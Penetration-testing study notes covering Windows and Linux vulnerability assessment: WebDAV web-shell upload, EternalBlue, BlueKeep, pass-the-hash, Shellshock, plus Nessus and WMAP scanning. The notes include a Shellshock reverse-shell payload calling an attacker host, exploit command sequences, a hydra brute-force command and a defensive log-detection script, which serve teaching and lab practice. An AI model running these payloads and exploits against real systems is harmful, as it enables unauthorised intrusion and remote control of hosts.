# 1.4 Vulnerability Assessment

***

## Windows Vulnerabilities

* Has been the dominant OS worldwide for a while
* Vulnerabilities ranging from MS08-067 to MS17-010
* Has many OS versions and releases, which fragments the threat surface

The versions share common weaknesses because of how they were developed and designed:

* Developed in C++, making them vulnerable to buffer overflows, arbitrary code execution, etc.
* Not configured to run securely by default
* Newly discovered vulnerabilities are not immediately patched by Microsoft
* Vulnerable to cross-platform vulnerabilities (like SQL injection attacks)
* Also vulnerable to physical attacks

As for the types of Windows vulnerabilities, some of the categories are:

<table><thead><tr><th width="131">Category</th><th>Description</th></tr></thead><tbody><tr><td>Information disclosure</td><td>Vulnerability that allows an attacker to access confidential data</td></tr><tr><td>Buffer overflows</td><td>Caused by a programming error that allows attackers to write past the end of a buffer into adjacent memory</td></tr><tr><td>Remote code execution</td><td>Vulnerability that allows an attacker to remotely execute code on a target</td></tr><tr><td>Privilege escalation</td><td>Vulnerability that allows an attacker to elevate their privileges after initial compromise</td></tr><tr><td>DoS attack</td><td>Vulnerability that allows an attacker to consume a system's resources, consequently preventing the system from functioning normally</td></tr></tbody></table>

### Frequently Exploited Services

Windows has various native services and protocols. These services provide an attacker with an access vector that they can utilize to gain access to a target host.

<table><thead><tr><th width="103">Service</th><th width="84">Ports</th><th>Purpose</th></tr></thead><tbody><tr><td>IIS</td><td>80, 443</td><td>Proprietary web server software</td></tr><tr><td>WebDAV</td><td>80, 443</td><td>HTTP extension that allows clients to update, delete, move and copy files on a web server. It's used to enable a web server to act as a file server</td></tr><tr><td>SMB</td><td>445</td><td>Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a LAN</td></tr><tr><td>RDP</td><td>3389</td><td>Proprietary GUI remote access protocol to remotely authenticate and interact with a Windows system</td></tr><tr><td>WinRM</td><td>5986, 443</td><td>Remote management protocol that can be used to facilitate remote access with Windows systems</td></tr></tbody></table>

### Scanning With Metasploit

Vulnerability scanning is the process of scanning a system for vulnerabilities and verifying whether they can be exploited. We will mainly use Metasploit auxiliary and exploit modules to scan for and identify inherent vulnerabilities in services, operating systems, and web applications.

You can search for exploits within Metasploit using:

```bash
search type:exploit name:(your search)
```

To search for Metasploit framework exploit modules from within a Kali terminal:

```bash
searchsploit "your search" | grep -e "Metasploit"
```

One very useful tool is `metasploit-autopwn`. It's available on GitHub [here](https://github.com/hahwul/metasploit-autopwn).

```bash
# Download the plugin (a single Ruby file):
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb

# Move it into the Metasploit framework plugin directory:
mv db_autopwn.rb /usr/share/metasploit-framework/plugins

# Load and run it from within msfconsole:
load db_autopwn
db_autopwn -p -t -PI
```

We can also use the `analyze` command within the Metasploit framework to check a host IP for detected vulnerabilities that have matching exploit modules.

### WebDAV Vulnerabilities

Microsoft IIS (Internet Information Services) is web server software developed by Microsoft for Windows. It can be used to host websites or web apps and provides admins with a GUI to manage them. It can host both static and dynamic web pages developed in ASP.NET and PHP. It normally runs on ports 80 and 443.

The supported executable file extensions for IIS are:

* `.asp`
* `.aspx`
* `.config`
* `.php`

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. It runs on top of Microsoft IIS on ports 80 and 443.

In order to connect to a WebDAV server, you have to provide credentials because it implements authentication (username and password). To exploit:

1. Identify whether WebDAV is running on IIS or Apache
2. Perform a brute-force attack to identify legitimate credentials to use for authentication
3. Authenticate with WebDAV
4. Upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target

One of the tools we can use against WebDAV is davtest. Davtest creates a test directory on the WebDAV server, uploads files with many different extensions into it and tries to execute each of them. It then lists the extensions that executed, which tells us which type of web shell the server will run.

```bash
davtest -auth username:password -url http://targetip/webdav
```

Another tool is cadaver. It's used for uploading, editing and moving files on a WebDAV server. We will use it to upload a web shell to the target IP address.

```bash
# Connect to the server; the following command is typed at the cadaver prompt
cadaver http://targetip/webdav
put /usr/share/webshells/asp/webshell.asp
```

Where PHP is accepted instead, we can upload the PHP web shell rather than the ASP one.

To brute-force credentials using hydra:

```bash
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (target ip) http-get /webdav/
```

### CVE-2017-0144 EternalBlue

The Windows SMB vulnerability EternalBlue (MS17-010 / CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.

It was developed by the NSA and then leaked to the public by a hacker group called the Shadow Brokers in 2017. It takes advantage of a vulnerability in the SMBv1 protocol that allows attackers to send specially crafted packets and obtain a meterpreter session or a reverse shell.

It was used in the WannaCry ransomware attack on June 27, 2017, to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.

It affects multiple versions of Windows:

* Windows Vista
* Windows 7
* Windows Server 2008
* Windows 8.1
* Windows Server 2012
* Windows 10 (only a certain build)
* Windows Server 2016

Microsoft released a patch for the vulnerability in 2017, but many systems and companies have still not patched. Metasploit has an auxiliary module that can be used to check if a target system is vulnerable to the exploit, and an exploit module that can be used to exploit the vulnerability on unpatched systems.

The auxiliary module - `smb_ms17_010` \
The exploit module - `ms17_010_eternalblue`

You can also exploit the vulnerability manually with publicly available exploits. One such exploit is AutoBlue-MS17-010, which can be found [here](https://github.com/3ndG4me/AutoBlue-MS17-010).

```bash
# Build the shellcode (run from the AutoBlue-MS17-010 directory)
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
cd ..

# Run the exploit script against the target with the generated x64 shellcode
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py (target ip) shellcode/sc_x64.bin
```

You can check if a system is vulnerable to this attack via Nmap:

```bash
nmap -sV -p445 --script=smb-vuln-ms17-010 (target ip)
```

Tip to set up a netcat listener:

```bash
nc -nvlp (the port you are listening on)
```

### CVE-2019-0708 BlueKeep

The Windows RDP vulnerability BlueKeep (CVE-2019-0708) is the name given to a vulnerability that can potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system. Microsoft made it public in May 2019 and released a patch alongside the disclosure. When discovered, about 1 million systems were vulnerable.

This exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to the kernel memory and execute code remotely at the system level without needing authentication.

It affects multiple versions of Windows:

* XP
* Vista
* Windows 7
* Windows Server 2008 & R2

Many unofficial proof-of-concept exploits circulate for it, some of which may themselves be malicious, so it is recommended to use only verified exploit code and modules. Metasploit has an auxiliary module and an exploit module that can be used against unpatched systems.

The auxiliary module - `cve_2019_0708_bluekeep` \
The exploit module - `cve_2019_0708_bluekeep_rce`

Note that exploits targeting kernel-space memory can and will cause crashes. To avoid this, be very careful and keep the scope of what you are exploiting as narrow as possible.

### Pass-the-Hash Attacks

Pass-the-hash is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and using them to authenticate to the target legitimately. This gives us access without having to exploit a service.

We can use the Metasploit PsExec module or the Crackmapexec tool to do this. You need the LM hash as well as the NTLM hash to do this.

```bash
# Within msfconsole, the exploit module is:
use exploit/windows/smb/psexec

set SMBUser (username)
set SMBPass (LM_hash:NTLM_hash)
```

You will have to set a target to get a meterpreter session.

```bash
crackmapexec smb (target ip) -u (username) -H "NTLM Hash" -X "any command you'd like to run"
```

***

## Linux Vulnerabilities

Linux is a free and open-source OS that consists of the Linux kernel and the GNU toolkit. Linux has various use cases, but it's typically deployed as a server operating system.

For this reason, there are specific services and protocols that will typically be found running on a Linux server. These services provide an attacker with an access vector that they can utilize to gain access to a target host.

### Frequently Exploited Services

<table><thead><tr><th width="97">Service</th><th width="84">Ports</th><th>Purpose</th></tr></thead><tbody><tr><td>Apache</td><td>80, 443</td><td>Free, open-source cross-platform web server. Accounts for over 80% of web servers globally.</td></tr><tr><td>SSH</td><td>22</td><td>Secure way to remotely access and control system over an unsecured network. Successor to Telnet.</td></tr><tr><td>FTP</td><td>21</td><td>Used to facilitate file sharing</td></tr><tr><td>SAMBA</td><td>445</td><td>Linux implementation of SMB</td></tr></tbody></table>

### CVE-2014-6271 Shellshock

The Linux Bash vulnerability Shellshock (CVE-2014-6271) is the name given to a vulnerability in the Bash shell (present since version 1.3) that allows an attacker to execute arbitrary commands remotely via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. It was discovered by Stephane Chazelas on 12/09/2014 and was made public on 24/09/2014.

Bash is a *nix shell that is part of the GNU project and is the default shell for most Linux distributions. The vulnerability lies in how Bash imports function definitions from environment variables: it keeps executing any commands that trail the function body, i.e. anything after the characters `() { :; };`. This only affects Linux, as Windows is not Unix-based.

In the context of remote exploitation, Apache web servers configured to run CGI scripts or `.sh` scripts are also vulnerable to this attack. CGI (Common Gateway Interface) scripts are used by Apache to execute commands on the Linux system, after which the output is displayed to the client.

In order to exploit it, you need to locate an input vector or script that lets you communicate with Bash. In the context of an Apache web server, we can use any legitimate CGI script accessible on the web server. Whenever a CGI script is executed, the web server starts a new process and runs the CGI script with Bash.

Because Apache passes the HTTP request headers to the CGI script as environment variables, and the script is run with Bash, we can place those characters in the User-Agent HTTP header followed by any other commands. It can be exploited manually or automatically with an exploit module.
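As an added example (not part of the original notes), the following Python detection routine scans Apache combined-format access log lines for the Bash function-definition prefix in the User-Agent and Referer headers, the same header position the exploitation above relies on. The log lines are constructed for the example.

```python
import re

# Apache "combined" log format:  host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The Bash function-definition prefix ("() {") that every Shellshock payload has to start with.
# Matching on the prefix rather than on a trailing command catches variants carrying any payload.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample lines: a normal request to the CGI script, two attempts against it
# (payload in User-Agent, then in Referer), and one unrelated request.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Sep/2014:10:12:01 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
198.51.100.7 - - [24/Sep/2014:10:12:05 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /usr/bin/id"
198.51.100.7 - - [24/Sep/2014:10:12:09 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 500 0 "() { :;}; /usr/bin/id" "curl/7.38.0"
203.0.113.10 - - [24/Sep/2014:10:13:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_combined(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_shellshock(log_text: str):
    """Return (source host, header, request path) for each request carrying a Shellshock prefix.

    Only Referer and User-Agent are recorded in the combined format; other headers
    (Cookie, Host, custom headers) also reach CGI scripts as environment variables,
    so the hits found here are a floor, not a complete count.
    """
    hits = []
    for line in log_text.splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue
        for header in ("agent", "referer"):
            if SHELLSHOCK_RE.search(entry[header]):
                parts = entry["request"].split(" ")
                hits.append((entry["host"], header, parts[1] if len(parts) > 1 else parts[0]))
                break  # one finding per request is enough
    return hits


if __name__ == "__main__":
    for host, header, path in flag_shellshock(SAMPLE_LOG):
        print(f"{host} sent a Shellshock payload in {header} to {path}")
```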

We can check if an Apache web server is vulnerable to this attack using Nmap. Replace the `/gettime.cgi` with the path of the CGI script on the web server you are performing this on.

```bash
nmap -sV (target ip) --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
```

To exploit this manually, enable FoxyProxy in Firefox to send traffic to Burp Suite. Then go to the Proxy tab and ensure that intercept is on. Now reload the page with the CGI script and send the request to the Repeater. Delete the User-Agent value and replace it with the following. You can replace the reverse shell with any command.

```html
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/your_ip/listen_port 0>&1'
```

To exploit this with the Metasploit framework, it has an auxiliary and exploit module. To run this, set the `RHOSTS` value to the target IP address and the `TARGETURI` value to the URL where the CGI file is running (in this case, it's `/gettime.cgi`). Also set the `LHOST` option to your IP address. Once this is done, you will have a meterpreter session.

The auxiliary module - `apache_mod_cgi_bash_env` \
The exploit module - `apache_mod_cgi_bash_env_exec`

***

## Vulnerability Scanning

### Nessus

It's a proprietary vulnerability scanner developed by Tenable. We can perform a scan on a target system which we can then import into Metasploit for analysis and exploitation. It automates the process of identifying vulnerabilities and provides us with information pertinent to a vulnerability like the CVE code.

There is a paid and free version of Nessus. The free version allows us to scan up to 16 IP addresses. We can access the link [here](https://www.tenable.com/products/nessus/nessus-essentials) and you can register for free to get the activation code.

Once you've completed a scan with Nessus, you can export the results as a `.nessus` file. We can then import this into the Metasploit framework using `db_import`. We can then go through these results and look for CVE codes. Then we can search for exploit modules using those CVE codes:

```bash
search cve:(enter the year) name:(the_service)
```

Alternatively, in the Nessus web interface, we can filter the results to show only those where Metasploit exploit modules are available. Clicking on a result shows the specific module name to run to gain a meterpreter session on the target.

### WMAP

WMAP is a web application vulnerability scanner that can also automate web server enumeration. It's available as an MSF plugin, can be loaded directly into MSF and integrates with the Metasploit Framework database.

To load WMAP within Metasploit:

```bash
workspace -a Web_Scan
load wmap

#To add a site to scan:
wmap_sites -a (target ip)

#To set up our target:
wmap_targets -t http://(target_ip)/

#To search for useful auxiliary modules for our target:
wmap_run -t

#To then run those auxiliary modules:
wmap_run -e

#To list out the vulnerabilities that wmap has found:
wmap_vulns -l
```

We can use the module `http_put` to test whether or not we can upload a file to a directory. If we can, then it can be exploited by uploading a malicious file.
